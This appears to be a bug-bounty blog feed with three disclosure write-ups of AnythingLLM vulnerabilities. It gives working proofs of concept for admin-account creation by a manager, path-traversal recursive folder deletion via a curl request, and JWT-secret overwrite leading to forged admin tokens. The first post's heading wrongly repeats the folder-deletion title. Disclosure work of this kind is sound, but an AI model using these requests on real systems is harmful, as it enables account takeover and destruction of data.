https://raltheo.fr/categories/bounty/ Recent content in bounty on Raltheo Hugo -- gohugo.io en-us Sat, 02 Mar 2024 00:00:00 +0000 https://raltheo.fr/p/cve-2024-0795/ Sat, 02 Mar 2024 00:00:00 +0000 https://raltheo.fr/p/cve-2024-0795/ <img src="https://raltheo.fr/p/cve-2024-0795/wordmark.png" alt="Featured image of post CVE-2024-0795 - Improper acces control / admin account takeover" /><h1 id="improper-input-validation-leads-to-arbitrary-folder-deletion-recursively">Improper input validation leads to arbitrary folder deletion (recursively)</h1> <h2 id="-requirements">🔒️ Requirements</h2> <ul> <li>Multi-user mode activated</li> <li>Be manager</li> </ul> <h2 id="-observation">👀 Observation</h2> <p>We can see in the ui the manager account cannot create / add / modify admin account however the protection is not present in the server.</p> <h2 id="-proof-of-concept">💥 Proof of Concept</h2> <p>Here is the actual users :<br> <img src="https://i.ibb.co/qkYCWnX/image.png" loading="lazy" alt="image" ></p> <p>I will use raltheo2 account.</p> <ol> <li>I open chrome dev tools</li> <li>Inside the console I put :</li> </ol> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-js" data-lang="js"><span class="line"><span class="cl"><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;/api/admin/users/new&#39;</span><span class="p">,</span> <span class="p">{</span><span class="nx">method</span><span class="o">:</span> <span class="s1">&#39;POST&#39;</span><span class="p">,</span><span class="nx">headers</span><span class="o">:</span> <span class="p">{</span><span class="s1">&#39;Authorization&#39;</span><span class="o">:</span> <span class="sb">`Bearer </span><span class="si">${</span><span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="s1">&#39;anythingllm_authToken&#39;</span><span class="p">)</span><span class="si">}</span><span class="sb">`</span><span class="p">,</span><span class="s1">&#39;Content-Type&#39;</span><span class="o">:</span><span class="s1">&#39;application/json&#39;</span><span class="p">},</span> <span class="nx">body</span><span class="o">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span><span class="nx">username</span><span class="o">:</span> <span class="s1">&#39;supadmin9&#39;</span><span class="p">,</span> <span class="nx">password</span><span class="o">:</span> <span class="s1">&#39;password&#39;</span><span class="p">,</span> <span class="nx">role</span><span class="o">:</span> <span class="s1">&#39;admin&#39;</span><span class="p">})})</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="https://i.ibb.co/KD8sk5X/image.png" loading="lazy" alt="image" ></p> <p>This will create an administrator account named <code>supadmin9</code> with password <code>password</code></p> <p><img src="https://i.ibb.co/3fGtvF8/image.png" loading="lazy" alt="image" ></p> <p>Now login into your new admin account :)</p> <hr> <h2 id="-fix-suggestion">🛠️ Fix suggestion</h2> <p>Separation should be made between admin and manager in server side as in the frontend.</p> <h2 id="-références">🖊️ références</h2> <p>You can find the report <a class="link" href="https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec/" target="_blank" rel="noopener" >here</a> and the CVE details <a class="link" href="https://nvd.nist.gov/vuln/detail/CVE-2024-0795" target="_blank" rel="noopener" >here</a>.</p> https://raltheo.fr/p/cve-2024-0763/ Tue, 27 Feb 2024 00:00:00 +0000 https://raltheo.fr/p/cve-2024-0763/ <img src="https://raltheo.fr/p/cve-2024-0763/wordmark.png" alt="Featured image of post CVE-2024-0763 - Arbitrary Folder Delete" /><h1 id="improper-input-validation-leads-to-arbitrary-folder-deletion-recursively">Improper input validation leads to arbitrary folder deletion (recursively)</h1> <h2 id="-requirements">🔒️ Requirements</h2> <p>A standard user account (without any admin privilege)</p> <h2 id="-description">📝 Description</h2> <p>Any user can delete an arbitraty folder (recursively) on remote server due to bad input sanitization leading to path traversal.</p> <p>This function allows to delete an arbitrary folder (recursively) :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-js" data-lang="js"><span class="line"><span class="cl"><span class="kr">async</span> <span class="kd">function</span> <span class="nx">purgeFolder</span><span class="p">(</span><span class="nx">folderName</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nx">folderName</span> <span class="o">===</span> <span class="s2">&#34;custom-documents&#34;</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kr">const</span> <span class="nx">documentsFolder</span> <span class="o">=</span> </span></span><span class="line"><span class="cl"> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">NODE_ENV</span> <span class="o">===</span> <span class="s2">&#34;development&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">?</span> <span class="nx">path</span><span class="p">.</span><span class="nx">resolve</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="sb">`../../storage/documents`</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">:</span> <span class="nx">path</span><span class="p">.</span><span class="nx">resolve</span><span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">STORAGE_DIR</span><span class="p">,</span> <span class="sb">`documents`</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kr">const</span> <span class="nx">folderPath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nx">resolve</span><span class="p">(</span><span class="nx">documentsFolder</span><span class="p">,</span> <span class="nx">folderName</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kr">const</span> <span class="nx">filenames</span> <span class="o">=</span> <span class="nx">fs</span> </span></span><span class="line"><span class="cl"> <span class="p">.</span><span class="nx">readdirSync</span><span class="p">(</span><span class="nx">folderPath</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">.</span><span class="nx">map</span><span class="p">((</span><span class="nx">file</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">folderName</span><span class="p">,</span> <span class="nx">file</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="kr">const</span> <span class="nx">workspaces</span> <span class="o">=</span> <span class="kr">await</span> <span class="nx">Workspace</span><span class="p">.</span><span class="nx">where</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kr">const</span> <span class="nx">purgePromises</span> <span class="o">=</span> <span class="p">[];</span> </span></span><span class="line"><span class="cl"> <span class="c1">// Remove associated Vector-cache files </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">for</span> <span class="p">(</span><span class="kr">const</span> <span class="nx">filename</span> <span class="k">of</span> <span class="nx">filenames</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">const</span> <span class="nx">rmVectorCache</span> <span class="o">=</span> <span class="p">()</span> <span class="p">=&gt;</span> </span></span><span class="line"><span class="cl"> <span class="k">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">)</span> <span class="p">=&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nx">purgeVectorCache</span><span class="p">(</span><span class="nx">filename</span><span class="p">).</span><span class="nx">then</span><span class="p">(()</span> <span class="p">=&gt;</span> <span class="nx">resolve</span><span class="p">(</span><span class="kc">true</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nx">purgePromises</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">rmVectorCache</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">// Remove workspace document associations </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="k">for</span> <span class="p">(</span><span class="kr">const</span> <span class="nx">workspace</span> <span class="k">of</span> <span class="nx">workspaces</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">const</span> <span class="nx">rmWorkspaceDoc</span> <span class="o">=</span> <span class="p">()</span> <span class="p">=&gt;</span> </span></span><span class="line"><span class="cl"> <span class="k">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">)</span> <span class="p">=&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nx">Document</span><span class="p">.</span><span class="nx">removeDocuments</span><span class="p">(</span><span class="nx">workspace</span><span class="p">,</span> <span class="nx">filenames</span><span class="p">).</span><span class="nx">then</span><span class="p">(()</span> <span class="p">=&gt;</span> <span class="nx">resolve</span><span class="p">(</span><span class="kc">true</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nx">purgePromises</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">rmWorkspaceDoc</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kr">await</span> <span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">(</span><span class="nx">purgePromises</span><span class="p">.</span><span class="nx">flat</span><span class="p">().</span><span class="nx">map</span><span class="p">((</span><span class="nx">f</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="nx">f</span><span class="p">()));</span> </span></span><span class="line"><span class="cl"> <span class="nx">fs</span><span class="p">.</span><span class="nx">rmSync</span><span class="p">(</span><span class="nx">folderPath</span><span class="p">,</span> <span class="p">{</span> <span class="nx">recursive</span><span class="o">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="c1">// Delete root document and source files. </span></span></span><span class="line"><span class="cl"><span class="c1"></span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>For example, if <code>folderName</code> contains something like <code>../../../../../../../tmp/</code>, the <code>fs.rmSync(folderPath, { recursive: true })</code> line of code will result in deleting the file <code>/tmp</code> folder.</p> <p>Now, this is a vulnerability because the function is called from this endpoint where an attacker fully control the <code>name</code> parameter of te request body.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-js" data-lang="js"><span class="line"><span class="cl"> <span class="nx">app</span><span class="p">.</span><span class="k">delete</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;/system/remove-folder&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="nx">validatedRequest</span><span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="kr">async</span> <span class="p">(</span><span class="nx">request</span><span class="p">,</span> <span class="nx">response</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">const</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">reqBody</span><span class="p">(</span><span class="nx">request</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kr">await</span> <span class="nx">purgeFolder</span><span class="p">(</span><span class="nx">name</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nx">response</span><span class="p">.</span><span class="nx">sendStatus</span><span class="p">(</span><span class="mi">200</span><span class="p">).</span><span class="nx">end</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">message</span><span class="p">,</span> <span class="nx">e</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nx">response</span><span class="p">.</span><span class="nx">sendStatus</span><span class="p">(</span><span class="mi">500</span><span class="p">).</span><span class="nx">end</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">);</span> </span></span></code></pre></td></tr></table> </div> </div><p>We can see that it directly calls <code>purgeFolder</code> with a fully controlled and unsanitized value, thus resulting in the deletion of an arbitrary folder (recursively) if we use <code>../</code> to do path traversal.</p> <h2 id="-proof-of-concept">💥 Proof of Concept</h2> <p>Here is a proof of concept deleting the <code>storage</code> folder (it could be any folder) :</p> <ol> <li>Check that the <code>storage</code> folder exists :</li> </ol> <p><img src="https://i.ibb.co/dMhdZzj/image.png" loading="lazy" ></p> <ol start="2"> <li>Login into your account (you can skip this step if using a development environment)</li> <li>Execute the following request : <ol> <li>Using <code>curl</code> :</li> </ol> </li> </ol> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl"><span class="c1"># Replace with your token</span> </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TOKEN</span><span class="o">=</span><span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl">curl --location --request DELETE <span class="s1">&#39;http://localhost:3001/api/system/remove-folder&#39;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"><span class="se"></span>--header <span class="s1">&#39;Content-Type: application/json&#39;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"><span class="se"></span>--header <span class="s2">&#34;Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"><span class="se"></span>--data <span class="s1">&#39;{&#34;name&#34; : &#34;../../storage&#34;}&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><p>You can also do it using <code>POSTMAN</code> :</p> <p><img src="https://i.ibb.co/NZ2myXT/image.png" loading="lazy" ></p> <ol> <li>Check that the <code>folder</code> folder has been deleted successfully :</li> </ol> <p><img src="https://i.ibb.co/ggZcBgg/image.png" loading="lazy" ></p> <h2 id="-fix-suggestion">🛠️ Fix suggestion</h2> <p>Sanitize the <code>name</code> parameter of the request.</p> <h2 id="-références">🖊️ références</h2> <p>You can find the report <a class="link" href="https://huntr.com/bounties/25a2f487-5a9c-4c7f-a2d3-b0527db73ea5/" target="_blank" rel="noopener" >here</a> and the CVE details <a class="link" href="https://nvd.nist.gov/vuln/detail/CVE-2024-0763" target="_blank" rel="noopener" >here</a>.</p> https://raltheo.fr/p/cve-2023-5833/ Thu, 14 Sep 2023 00:00:00 +0000 https://raltheo.fr/p/cve-2023-5833/ <img src="https://raltheo.fr/p/cve-2023-5833/wordmark.png" alt="Featured image of post CVE-2023-5833 - Admin account TakeOver" /><h2 id="-description">📝 Description</h2> <p>The endpoint <code>api/system/update-env</code> allows any authenticated users to change env variables of the back-end process. We will abuse this functionnality to change <code>JWT_SECRET</code> env variable (which is used to sign the JWT token).</p> <h2 id="-proof-of-concept">💥 Proof of Concept</h2> <p>Imagine the following list of accounts is used : <img src="https://i.ibb.co/rwsDqVX/s2.png" loading="lazy" alt="img" ></p> <p>Login to the user (who is not admin) account and grab the jwt token in the localStorage (with the key : <code>anythingllm_authToken</code> ) <img src="https://i.ibb.co/34X5Xdq/s3.png" loading="lazy" alt="img" ></p> <p>The jwt token infos are (base64 decoded) :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;alg&#34;</span><span class="p">:</span> <span class="s2">&#34;HS256&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;typ&#34;</span><span class="p">:</span> <span class="s2">&#34;JWT&#34;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;id&#34;</span><span class="p">:</span> <span class="mi">2</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;username&#34;</span><span class="p">:</span> <span class="s2">&#34;user&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;iat&#34;</span><span class="p">:</span> <span class="mi">1694641865</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;exp&#34;</span><span class="p">:</span> <span class="mi">1697233865</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Now go on Postman and send a <code>POST</code> request to <code>http://localhost:3001/api/system/update-env</code> with our JWT as Bearer token value and with the following json as body :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;JWTSecret&#34;</span><span class="p">:</span><span class="s2">&#34;admintakeover&#34;</span><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Now go to <a class="link" href="https://jwt.io/" target="_blank" rel="noopener" >jwt.io</a> and put the JWT token, change the <code>id</code> and <code>username</code>, sign the JWT with the secret <code>admintakeover</code> <img src="https://i.ibb.co/S3WL8GK/s5.png" loading="lazy" alt="img" ></p> <p>Put this token in your localstorage and reload page, you should be admin (we can see i&rsquo;m admin with the forged jwt token): <img src="https://i.ibb.co/WgjXH7p/s6.png" loading="lazy" alt="img" ></p> <h2 id="-références">🖊️ références</h2> <p>You can find the report <a class="link" href="https://huntr.com/bounties/00ec6847-125b-43e9-9658-d3cace1751d6/" target="_blank" rel="noopener" >here</a> and the CVE details <a class="link" href="https://nvd.nist.gov/vuln/detail/CVE-2023-5833" target="_blank" rel="noopener" >here</a>.</p>